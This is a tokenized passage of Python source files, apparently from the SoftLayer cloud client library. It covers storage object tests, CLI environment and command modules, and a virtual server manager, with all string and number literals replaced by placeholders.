called_once_with ( self . obj . container , <EOL> self . obj . name , <EOL> headers = None ) <EOL> def test_read ( self ) : <EOL> _result = Mock ( ) <EOL> self . obj . make_request = Mock ( return_value = _result ) <EOL> self . obj . read ( ) <EOL> self . obj . make_request . called_once_with ( '<STR_LIT:GET>' ) <EOL> def test_read_with_offsets ( self ) : <EOL> _result = Mock ( ) <EOL> self . obj . make_request = Mock ( return_value = _result ) <EOL> self . obj . read ( size = <NUM_LIT> , offset = <NUM_LIT> ) <EOL> self . assertEqual ( self . obj . make_request . call_args [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . obj . read ( size = <NUM_LIT> ) <EOL> self . assertEqual ( self . obj . make_request . call_args [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . obj . read ( size = - <NUM_LIT> ) <EOL> self . assertEqual ( self . obj . make_request . call_args [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . obj . read ( offset = <NUM_LIT> ) <EOL> self . assertEqual ( self . obj . make_request . call_args [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> def test_copy_to ( self ) : <EOL> _make_request = Mock ( ) <EOL> self . obj . _make_request = _make_request <EOL> self . obj . _headers = Mock ( return_value = { } ) <EOL> other_obj = Mock ( ) <EOL> self . obj . copy_to ( other_obj , <NUM_LIT:1> , <NUM_LIT:2> , a1 = <NUM_LIT:1> , a2 = <NUM_LIT:2> ) <EOL> self . obj . _headers . called_once_with ( ) <EOL> h = { '<STR_LIT>' : other_obj . path , '<STR_LIT>' : <NUM_LIT:0> } <EOL> _make_request . called_once_with ( '<STR_LIT>' , <NUM_LIT:1> , <NUM_LIT:2> , <EOL> headers = h , <EOL> data = '<STR_LIT>' , a1 = <NUM_LIT:1> , a2 = <NUM_LIT:2> ) <EOL> def test_object_is_dir ( self ) : <EOL> dir_object = StorageObject ( '<STR_LIT>' , '<STR_LIT>' , <EOL> client = self . 
client , <EOL> headers = { '<STR_LIT>' : <EOL> '<STR_LIT>' } ) <EOL> legacy_dir_object = StorageObject ( '<STR_LIT>' , '<STR_LIT>' , <EOL> client = self . client , <EOL> headers = { '<STR_LIT>' : <EOL> '<STR_LIT>' } ) <EOL> file_object = StorageObject ( '<STR_LIT>' , '<STR_LIT>' , <EOL> client = self . client , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertTrue ( dir_object . is_dir ( ) ) <EOL> self . assertTrue ( legacy_dir_object . is_dir ( ) ) <EOL> self . assertFalse ( file_object . is_dir ( ) ) <EOL> def test_rename ( self ) : <EOL> self . obj . copy_to = Mock ( ) <EOL> self . obj . delete = Mock ( ) <EOL> _new_obj = Mock ( ) <EOL> self . obj . rename ( _new_obj , <NUM_LIT:1> , <NUM_LIT:2> , a1 = <NUM_LIT:1> , a2 = <NUM_LIT:2> ) <EOL> self . obj . copy_to . called_once_with ( _new_obj , <NUM_LIT:1> , <NUM_LIT:2> , a1 = <NUM_LIT:1> , a2 = <NUM_LIT:2> ) <EOL> self . obj . delete . called_once_with ( ) <EOL> def setUp ( self ) : <EOL> self . client = Mock ( ) <EOL> self . obj = StorageObject ( '<STR_LIT>' , '<STR_LIT>' , client = self . client ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import importlib <EOL> import click <EOL> import pkg_resources <EOL> import SoftLayer <EOL> from SoftLayer . CLI import formatting <EOL> from SoftLayer . CLI import routes <EOL> class Environment ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . commands = { } <EOL> self . aliases = { } <EOL> self . vars = { } <EOL> self . client = None <EOL> self . format = '<STR_LIT>' <EOL> self . skip_confirmations = False <EOL> self . config_file = None <EOL> self . _modules_loaded = False <EOL> def out ( self , output , newline = True ) : <EOL> """<STR_LIT>""" <EOL> click . echo ( output , nl = newline ) <EOL> def err ( self , output , newline = True ) : <EOL> """<STR_LIT>""" <EOL> click . echo ( output , nl = newline , err = True ) <EOL> def fmt ( self , output ) : <EOL> """<STR_LIT>""" <EOL> return formatting . format_output ( output , fmt = self . format ) <EOL> def fout ( self , output , newline = True ) : <EOL> """<STR_LIT>""" <EOL> if output is not None : <EOL> self . out ( self . fmt ( output ) , newline = newline ) <EOL> def input ( self , prompt , default = None , show_default = True ) : <EOL> """<STR_LIT>""" <EOL> return click . prompt ( prompt , default = default , show_default = show_default ) <EOL> def getpass ( self , prompt , default = None ) : <EOL> """<STR_LIT>""" <EOL> return click . prompt ( prompt , hide_input = True , default = default ) <EOL> def list_commands ( self , * path ) : <EOL> """<STR_LIT>""" <EOL> path_str = '<STR_LIT::>' . join ( path ) <EOL> commands = [ ] <EOL> for command in self . commands . keys ( ) : <EOL> if all ( [ command . startswith ( path_str ) , <EOL> len ( path ) == command . count ( "<STR_LIT::>" ) ] ) : <EOL> offset = len ( path_str ) + <NUM_LIT:1> if path_str else <NUM_LIT:0> <EOL> commands . append ( command [ offset : ] ) <EOL> return sorted ( commands ) <EOL> def get_command ( self , * path ) : <EOL> """<STR_LIT>""" <EOL> path_str = '<STR_LIT::>' . 
join ( path ) <EOL> if path_str in self . commands : <EOL> return self . commands [ path_str ] . load ( ) <EOL> return None <EOL> def resolve_alias ( self , path_str ) : <EOL> """<STR_LIT>""" <EOL> if path_str in self . aliases : <EOL> return self . aliases [ path_str ] <EOL> return path_str <EOL> def load ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _modules_loaded is True : <EOL> return <EOL> self . load_modules_from_python ( routes . ALL_ROUTES ) <EOL> self . aliases . update ( routes . ALL_ALIASES ) <EOL> self . _load_modules_from_entry_points ( '<STR_LIT>' ) <EOL> self . _modules_loaded = True <EOL> def load_modules_from_python ( self , route_list ) : <EOL> """<STR_LIT>""" <EOL> for name , modpath in route_list : <EOL> if '<STR_LIT::>' in modpath : <EOL> path , attr = modpath . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> else : <EOL> path , attr = modpath , None <EOL> self . commands [ name ] = ModuleLoader ( path , attr = attr ) <EOL> def _load_modules_from_entry_points ( self , entry_point_group ) : <EOL> """<STR_LIT>""" <EOL> for obj in pkg_resources . iter_entry_points ( group = entry_point_group , <EOL> name = None ) : <EOL> self . commands [ obj . name ] = obj <EOL> def ensure_client ( self , config_file = None , is_demo = False , proxy = None ) : <EOL> """<STR_LIT>""" <EOL> if self . client is not None : <EOL> return <EOL> if is_demo : <EOL> client = SoftLayer . BaseClient ( <EOL> transport = SoftLayer . FixtureTransport ( ) , <EOL> auth = None , <EOL> ) <EOL> else : <EOL> client = SoftLayer . create_client_from_env ( <EOL> proxy = proxy , <EOL> config_file = config_file , <EOL> ) <EOL> self . client = client <EOL> class ModuleLoader ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , import_path , attr = None ) : <EOL> self . import_path = import_path <EOL> self . attr = attr <EOL> def load ( self ) : <EOL> """<STR_LIT>""" <EOL> module = importlib . import_module ( self . import_path ) <EOL> if self . 
attr : <EOL> return getattr ( module , self . attr ) <EOL> return module <EOL> pass_env = click . make_pass_decorator ( Environment , ensure = True ) </s>
<s> """<STR_LIT>""" <EOL> import click <EOL> from SoftLayer . CLI import exceptions <EOL> def multi_option ( * param_decls , ** attrs ) : <EOL> """<STR_LIT>""" <EOL> attrhelp = attrs . get ( '<STR_LIT>' , None ) <EOL> if attrhelp is not None : <EOL> newhelp = attrhelp + "<STR_LIT>" <EOL> attrs [ '<STR_LIT>' ] = newhelp <EOL> attrs [ '<STR_LIT>' ] = True <EOL> return click . option ( * param_decls , ** attrs ) <EOL> def resolve_id ( resolver , identifier , name = '<STR_LIT:object>' ) : <EOL> """<STR_LIT>""" <EOL> ids = resolver ( identifier ) <EOL> if len ( ids ) == <NUM_LIT:0> : <EOL> raise exceptions . CLIAbort ( "<STR_LIT>" <EOL> % ( name , identifier ) ) <EOL> if len ( ids ) > <NUM_LIT:1> : <EOL> raise exceptions . CLIAbort ( <EOL> "<STR_LIT>" % <EOL> ( name , identifier , '<STR_LIT:U+002CU+0020>' . join ( [ str ( _id ) for _id in ids ] ) ) ) <EOL> return ids [ <NUM_LIT:0> ] </s>
<s> """<STR_LIT>""" <EOL> import click <EOL> import SoftLayer <EOL> from SoftLayer . CLI import environment <EOL> from SoftLayer . CLI import exceptions <EOL> from SoftLayer . CLI import formatting <EOL> from SoftLayer . CLI import loadbal <EOL> @ click . command ( ) <EOL> @ click . argument ( '<STR_LIT>' ) <EOL> @ environment . pass_env <EOL> def cli ( env , identifier ) : <EOL> """<STR_LIT>""" <EOL> mgr = SoftLayer . LoadBalancerManager ( env . client ) <EOL> _ , service_id = loadbal . parse_id ( identifier ) <EOL> if not ( env . skip_confirmations or <EOL> formatting . confirm ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) : <EOL> raise exceptions . CLIAbort ( '<STR_LIT>' ) <EOL> mgr . toggle_service_status ( service_id ) <EOL> env . fout ( '<STR_LIT>' % identifier ) </s>
<s> """<STR_LIT>""" <EOL> import click <EOL> import SoftLayer <EOL> from SoftLayer . CLI import environment <EOL> from SoftLayer . CLI import exceptions <EOL> @ click . command ( ) <EOL> @ click . option ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> @ click . option ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> @ click . option ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> @ click . option ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> @ click . option ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> @ click . option ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> @ click . option ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> @ click . option ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> @ click . option ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> @ click . option ( '<STR_LIT>' , <EOL> default = None , <EOL> help = '<STR_LIT>' ) <EOL> @ click . option ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> @ environment . pass_env <EOL> def cli ( env , abuse , address1 , address2 , city , company , country , firstname , <EOL> lastname , postal , public , state ) : <EOL> """<STR_LIT>""" <EOL> mgr = SoftLayer . NetworkManager ( env . client ) <EOL> update = { <EOL> '<STR_LIT>' : abuse , <EOL> '<STR_LIT>' : address1 , <EOL> '<STR_LIT>' : address2 , <EOL> '<STR_LIT>' : company , <EOL> '<STR_LIT>' : city , <EOL> '<STR_LIT>' : country , <EOL> '<STR_LIT>' : firstname , <EOL> '<STR_LIT>' : lastname , <EOL> '<STR_LIT>' : postal , <EOL> '<STR_LIT:state>' : state , <EOL> '<STR_LIT>' : public , <EOL> } <EOL> if public is True : <EOL> update [ '<STR_LIT>' ] = False <EOL> elif public is False : <EOL> update [ '<STR_LIT>' ] = True <EOL> check = [ x for x in update . values ( ) if x is not None ] <EOL> if not check : <EOL> raise exceptions . CLIAbort ( <EOL> "<STR_LIT>" ) <EOL> mgr . edit_rwhois ( ** update ) </s>
<s> """<STR_LIT>""" <EOL> import click <EOL> from SoftLayer . CLI import formatting <EOL> TEMPLATE_MSG = "<STR_LIT>" <EOL> def get_ticket_results ( mgr , ticket_id , update_count = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> ticket = mgr . get_ticket ( ticket_id ) <EOL> table = formatting . KeyValueTable ( [ '<STR_LIT:name>' , '<STR_LIT:value>' ] ) <EOL> table . align [ '<STR_LIT:name>' ] = '<STR_LIT:r>' <EOL> table . align [ '<STR_LIT:value>' ] = '<STR_LIT:l>' <EOL> table . add_row ( [ '<STR_LIT:id>' , ticket [ '<STR_LIT:id>' ] ] ) <EOL> table . add_row ( [ '<STR_LIT:title>' , ticket [ '<STR_LIT:title>' ] ] ) <EOL> if ticket . get ( '<STR_LIT>' ) : <EOL> user = ticket [ '<STR_LIT>' ] <EOL> table . add_row ( [ <EOL> '<STR_LIT:user>' , <EOL> "<STR_LIT>" % ( user . get ( '<STR_LIT>' ) , user . get ( '<STR_LIT>' ) ) , <EOL> ] ) <EOL> table . add_row ( [ '<STR_LIT:status>' , ticket [ '<STR_LIT:status>' ] [ '<STR_LIT:name>' ] ] ) <EOL> table . add_row ( [ '<STR_LIT>' , ticket . get ( '<STR_LIT>' ) ] ) <EOL> table . add_row ( [ '<STR_LIT>' , ticket . get ( '<STR_LIT>' ) ] ) <EOL> updates = ticket . get ( '<STR_LIT>' , [ ] ) <EOL> count = min ( len ( updates ) , update_count ) <EOL> count_offset = len ( updates ) - count + <NUM_LIT:1> <EOL> for i , update in enumerate ( updates [ - count : ] ) : <EOL> wrapped_entry = "<STR_LIT>" <EOL> editor = update . get ( '<STR_LIT>' ) <EOL> if editor : <EOL> if editor . get ( '<STR_LIT>' ) : <EOL> wrapped_entry += "<STR_LIT>" % ( editor [ '<STR_LIT>' ] ) <EOL> if editor . get ( '<STR_LIT>' ) : <EOL> wrapped_entry += "<STR_LIT>" % ( editor . get ( '<STR_LIT>' ) , <EOL> editor . get ( '<STR_LIT>' ) ) <EOL> wrapped_entry += click . wrap_text ( update [ '<STR_LIT>' ] . replace ( '<STR_LIT:\r>' , '<STR_LIT>' ) ) <EOL> table . add_row ( [ '<STR_LIT>' % ( count_offset + i , ) , wrapped_entry ] ) <EOL> return table </s>
<s> """<STR_LIT>""" <EOL> from SoftLayer import consts <EOL> from SoftLayer . API import * <EOL> from SoftLayer . managers import * <EOL> from SoftLayer . exceptions import * <EOL> from SoftLayer . auth import * <EOL> from SoftLayer . transports import * <EOL> __title__ = '<STR_LIT>' <EOL> __version__ = consts . VERSION <EOL> __author__ = '<STR_LIT>' <EOL> __license__ = '<STR_LIT>' <EOL> __copyright__ = '<STR_LIT>' <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] </s>
<s> getObject = { '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT:id>' : <NUM_LIT> } } } </s>
<s> """<STR_LIT>""" <EOL> import datetime <EOL> import itertools <EOL> import socket <EOL> import time <EOL> from SoftLayer import exceptions <EOL> from SoftLayer . managers import ordering <EOL> from SoftLayer import utils <EOL> class VSManager ( utils . IdentifierMixin , object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , client , ordering_manager = None ) : <EOL> self . client = client <EOL> self . account = client [ '<STR_LIT>' ] <EOL> self . guest = client [ '<STR_LIT>' ] <EOL> self . resolvers = [ self . _get_ids_from_ip , self . _get_ids_from_hostname ] <EOL> if ordering_manager is None : <EOL> self . ordering_manager = ordering . OrderingManager ( client ) <EOL> else : <EOL> self . ordering_manager = ordering_manager <EOL> def list_instances ( self , hourly = True , monthly = True , tags = None , cpus = None , <EOL> memory = None , hostname = None , domain = None , <EOL> local_disk = None , datacenter = None , nic_speed = None , <EOL> public_ip = None , private_ip = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' not in kwargs : <EOL> items = [ <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:status>' , <EOL> ] <EOL> kwargs [ '<STR_LIT>' ] = "<STR_LIT>" % '<STR_LIT:U+002C>' . join ( items ) <EOL> call = '<STR_LIT>' <EOL> if not all ( [ hourly , monthly ] ) : <EOL> if hourly : <EOL> call = '<STR_LIT>' <EOL> elif monthly : <EOL> call = '<STR_LIT>' <EOL> _filter = utils . NestedDict ( kwargs . 
get ( '<STR_LIT>' ) or { } ) <EOL> if tags : <EOL> _filter [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ { '<STR_LIT:name>' : '<STR_LIT:data>' , '<STR_LIT:value>' : tags } ] , <EOL> } <EOL> if cpus : <EOL> _filter [ '<STR_LIT>' ] [ '<STR_LIT>' ] = utils . query_filter ( cpus ) <EOL> if memory : <EOL> _filter [ '<STR_LIT>' ] [ '<STR_LIT>' ] = utils . query_filter ( memory ) <EOL> if hostname : <EOL> _filter [ '<STR_LIT>' ] [ '<STR_LIT>' ] = utils . query_filter ( hostname ) <EOL> if domain : <EOL> _filter [ '<STR_LIT>' ] [ '<STR_LIT>' ] = utils . query_filter ( domain ) <EOL> if local_disk is not None : <EOL> _filter [ '<STR_LIT>' ] [ '<STR_LIT>' ] = ( <EOL> utils . query_filter ( bool ( local_disk ) ) ) <EOL> if datacenter : <EOL> _filter [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] = ( <EOL> utils . query_filter ( datacenter ) ) <EOL> if nic_speed : <EOL> _filter [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = ( <EOL> utils . query_filter ( nic_speed ) ) <EOL> if public_ip : <EOL> _filter [ '<STR_LIT>' ] [ '<STR_LIT>' ] = ( <EOL> utils . query_filter ( public_ip ) ) <EOL> if private_ip : <EOL> _filter [ '<STR_LIT>' ] [ '<STR_LIT>' ] = ( <EOL> utils . query_filter ( private_ip ) ) <EOL> kwargs [ '<STR_LIT>' ] = _filter . to_dict ( ) <EOL> func = getattr ( self . 
account , call ) <EOL> return func ( ** kwargs ) <EOL> def get_instance ( self , instance_id , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' not in kwargs : <EOL> items = [ <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '''<STR_LIT>''' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:status>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '''<STR_LIT>''' , <EOL> '''<STR_LIT>''' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> kwargs [ '<STR_LIT>' ] = "<STR_LIT>" % '<STR_LIT:U+002C>' . join ( items ) <EOL> return self . guest . getObject ( id = instance_id , ** kwargs ) <EOL> def get_create_options ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . guest . getCreateObjectOptions ( ) <EOL> def cancel_instance ( self , instance_id ) : <EOL> """<STR_LIT>""" <EOL> return self . guest . deleteObject ( id = instance_id ) <EOL> def reload_instance ( self , instance_id , <EOL> post_uri = None , <EOL> ssh_keys = None , <EOL> image_id = None ) : <EOL> """<STR_LIT>""" <EOL> config = { } <EOL> if post_uri : <EOL> config [ '<STR_LIT>' ] = post_uri <EOL> if ssh_keys : <EOL> config [ '<STR_LIT>' ] = [ key_id for key_id in ssh_keys ] <EOL> if image_id : <EOL> config [ '<STR_LIT>' ] = image_id <EOL> return self . client . 
call ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , config , id = instance_id ) <EOL> def _generate_create_dict ( <EOL> self , cpus = None , memory = None , hourly = True , <EOL> hostname = None , domain = None , local_disk = True , <EOL> datacenter = None , os_code = None , image_id = None , <EOL> dedicated = False , public_vlan = None , private_vlan = None , <EOL> userdata = None , nic_speed = None , disks = None , post_uri = None , <EOL> private = False , ssh_keys = None ) : <EOL> """<STR_LIT>""" <EOL> required = [ cpus , memory , hostname , domain ] <EOL> mutually_exclusive = [ <EOL> { '<STR_LIT>' : os_code , "<STR_LIT>" : image_id } , <EOL> ] <EOL> if not all ( required ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> for mu_ex in mutually_exclusive : <EOL> if all ( mu_ex . values ( ) ) : <EOL> raise ValueError ( <EOL> '<STR_LIT>' % ( '<STR_LIT:U+002C>' . join ( mu_ex . keys ( ) ) ) ) <EOL> data = { <EOL> "<STR_LIT>" : int ( cpus ) , <EOL> "<STR_LIT>" : int ( memory ) , <EOL> "<STR_LIT>" : hostname , <EOL> "<STR_LIT>" : domain , <EOL> "<STR_LIT>" : local_disk , <EOL> } <EOL> data [ "<STR_LIT>" ] = hourly <EOL> if dedicated : <EOL> data [ "<STR_LIT>" ] = dedicated <EOL> if private : <EOL> data [ '<STR_LIT>' ] = private <EOL> if image_id : <EOL> data [ "<STR_LIT>" ] = { "<STR_LIT>" : image_id } <EOL> elif os_code : <EOL> data [ "<STR_LIT>" ] = os_code <EOL> if datacenter : <EOL> data [ "<STR_LIT>" ] = { "<STR_LIT:name>" : datacenter } <EOL> if public_vlan : <EOL> data . update ( { <EOL> '<STR_LIT>' : { <EOL> "<STR_LIT>" : { "<STR_LIT:id>" : int ( public_vlan ) } } } ) <EOL> if private_vlan : <EOL> data . 
update ( { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { "<STR_LIT:id>" : int ( private_vlan ) } } } ) <EOL> if userdata : <EOL> data [ '<STR_LIT>' ] = [ { '<STR_LIT:value>' : userdata } ] <EOL> if nic_speed : <EOL> data [ '<STR_LIT>' ] = [ { '<STR_LIT>' : nic_speed } ] <EOL> if disks : <EOL> data [ '<STR_LIT>' ] = [ <EOL> { "<STR_LIT>" : "<STR_LIT:0>" , "<STR_LIT>" : { "<STR_LIT>" : disks [ <NUM_LIT:0> ] } } <EOL> ] <EOL> for dev_id , disk in enumerate ( disks [ <NUM_LIT:1> : ] , start = <NUM_LIT:2> ) : <EOL> data [ '<STR_LIT>' ] . append ( <EOL> { <EOL> "<STR_LIT>" : str ( dev_id ) , <EOL> "<STR_LIT>" : { "<STR_LIT>" : disk } <EOL> } <EOL> ) <EOL> if post_uri : <EOL> data [ '<STR_LIT>' ] = post_uri <EOL> if ssh_keys : <EOL> data [ '<STR_LIT>' ] = [ { '<STR_LIT:id>' : key_id } for key_id in ssh_keys ] <EOL> return data <EOL> def wait_for_transaction ( self , instance_id , limit , delay = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> return self . wait_for_ready ( instance_id , limit , delay = delay , <EOL> pending = True ) <EOL> def wait_for_ready ( self , instance_id , limit , delay = <NUM_LIT:1> , pending = False ) : <EOL> """<STR_LIT>""" <EOL> until = time . time ( ) + limit <EOL> for new_instance in itertools . repeat ( instance_id ) : <EOL> mask = """<STR_LIT>""" <EOL> instance = self . get_instance ( new_instance , mask = mask ) <EOL> last_reload = utils . lookup ( instance , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:id>' ) <EOL> active_transaction = utils . lookup ( instance , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:id>' ) <EOL> reloading = all ( ( <EOL> active_transaction , <EOL> last_reload , <EOL> last_reload == active_transaction , <EOL> ) ) <EOL> outstanding = False <EOL> if pending : <EOL> outstanding = active_transaction <EOL> if all ( [ instance . get ( '<STR_LIT>' ) , <EOL> not reloading , <EOL> not outstanding ] ) : <EOL> return True <EOL> now = time . time ( ) <EOL> if now >= until : <EOL> return False <EOL> time . 
sleep ( min ( delay , until - now ) ) <EOL> def verify_create_instance ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> kwargs . pop ( '<STR_LIT>' , None ) <EOL> create_options = self . _generate_create_dict ( ** kwargs ) <EOL> return self . guest . generateOrderTemplate ( create_options ) <EOL> def create_instance ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> tags = kwargs . pop ( '<STR_LIT>' , None ) <EOL> inst = self . guest . createObject ( self . _generate_create_dict ( ** kwargs ) ) <EOL> if tags is not None : <EOL> self . guest . setTags ( tags , id = inst [ '<STR_LIT:id>' ] ) <EOL> return inst <EOL> def create_instances ( self , config_list ) : <EOL> """<STR_LIT>""" <EOL> tags = [ conf . pop ( '<STR_LIT>' , None ) for conf in config_list ] <EOL> resp = self . guest . createObjects ( [ self . _generate_create_dict ( ** kwargs ) <EOL> for kwargs in config_list ] ) <EOL> for instance , tag in zip ( resp , tags ) : <EOL> if tag is not None : <EOL> self . guest . setTags ( tag , id = instance [ '<STR_LIT:id>' ] ) <EOL> return resp <EOL> def change_port_speed ( self , instance_id , public , speed ) : <EOL> """<STR_LIT>""" <EOL> if public : <EOL> return self . client . call ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> speed , id = instance_id ) <EOL> else : <EOL> return self . client . call ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> speed , id = instance_id ) <EOL> def _get_ids_from_hostname ( self , hostname ) : <EOL> """<STR_LIT>""" <EOL> results = self . list_instances ( hostname = hostname , mask = "<STR_LIT:id>" ) <EOL> return [ result [ '<STR_LIT:id>' ] for result in results ] <EOL> def _get_ids_from_ip ( self , ip_address ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> socket . inet_aton ( ip_address ) <EOL> except socket . error : <EOL> return [ ] <EOL> results = self . list_instances ( public_ip = ip_address , mask = "<STR_LIT:id>" ) <EOL> if results : <EOL> return [ result [ '<STR_LIT:id>' ] for result in results ] <EOL> results = self . 
list_instances ( private_ip = ip_address , mask = "<STR_LIT:id>" ) <EOL> if results : <EOL> return [ result [ '<STR_LIT:id>' ] for result in results ] <EOL> def edit ( self , instance_id , userdata = None , hostname = None , domain = None , <EOL> notes = None , tags = None ) : <EOL> """<STR_LIT>""" <EOL> obj = { } <EOL> if userdata : <EOL> self . guest . setUserMetadata ( [ userdata ] , id = instance_id ) <EOL> if tags is not None : <EOL> self . guest . setTags ( tags , id = instance_id ) <EOL> if hostname : <EOL> obj [ '<STR_LIT>' ] = hostname <EOL> if domain : <EOL> obj [ '<STR_LIT>' ] = domain <EOL> if notes : <EOL> obj [ '<STR_LIT>' ] = notes <EOL> if not obj : <EOL> return True <EOL> return self . guest . editObject ( obj , id = instance_id ) <EOL> def rescue ( self , instance_id ) : <EOL> """<STR_LIT>""" <EOL> return self . guest . executeRescueLayer ( id = instance_id ) <EOL> def capture ( self , instance_id , name , additional_disks = False , notes = None ) : <EOL> """<STR_LIT>""" <EOL> vsi = self . get_instance ( instance_id ) <EOL> disk_filter = lambda x : x [ '<STR_LIT>' ] == '<STR_LIT:0>' <EOL> if additional_disks : <EOL> disk_filter = lambda x : ( str ( x [ '<STR_LIT>' ] ) != '<STR_LIT:1>' and <EOL> x [ '<STR_LIT>' ] != '<STR_LIT>' ) <EOL> disks = [ block_device for block_device in vsi [ '<STR_LIT>' ] <EOL> if disk_filter ( block_device ) ] <EOL> return self . guest . createArchiveTransaction ( <EOL> name , disks , notes , id = instance_id ) <EOL> def upgrade ( self , instance_id , cpus = None , memory = None , <EOL> nic_speed = None , public = True ) : <EOL> """<STR_LIT>""" <EOL> package_items = self . _get_package_items ( ) <EOL> prices = [ ] <EOL> for option , value in { '<STR_LIT>' : cpus , <EOL> '<STR_LIT>' : memory , <EOL> '<STR_LIT>' : nic_speed } . items ( ) : <EOL> if not value : <EOL> continue <EOL> price_id = self . 
_get_price_id_for_upgrade ( package_items , <EOL> option , <EOL> value , <EOL> public ) <EOL> if not price_id : <EOL> raise exceptions . SoftLayerError ( <EOL> "<STR_LIT>" % ( option , value ) ) <EOL> prices . append ( { '<STR_LIT:id>' : price_id } ) <EOL> maintenance_window = datetime . datetime . now ( utils . UTC ( ) ) <EOL> order = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : prices , <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:value>' : maintenance_window . strftime ( "<STR_LIT>" ) <EOL> } ] , <EOL> '<STR_LIT>' : [ { '<STR_LIT:id>' : int ( instance_id ) } ] , <EOL> } <EOL> if prices : <EOL> self . client [ '<STR_LIT>' ] . placeOrder ( order ) <EOL> return True <EOL> return False <EOL> def _get_package_items ( self ) : <EOL> """<STR_LIT>""" <EOL> mask = [ <EOL> '<STR_LIT:description>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> mask = "<STR_LIT>" % '<STR_LIT:U+002C>' . join ( mask ) <EOL> package_type = "<STR_LIT>" <EOL> package_id = self . ordering_manager . get_package_id_by_type ( package_type ) <EOL> package_service = self . client [ '<STR_LIT>' ] <EOL> return package_service . getItems ( id = package_id , mask = mask ) <EOL> def _get_price_id_for_upgrade ( self , package_items , option , value , <EOL> public = True ) : <EOL> """<STR_LIT>""" <EOL> option_category = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> category_code = option_category [ option ] 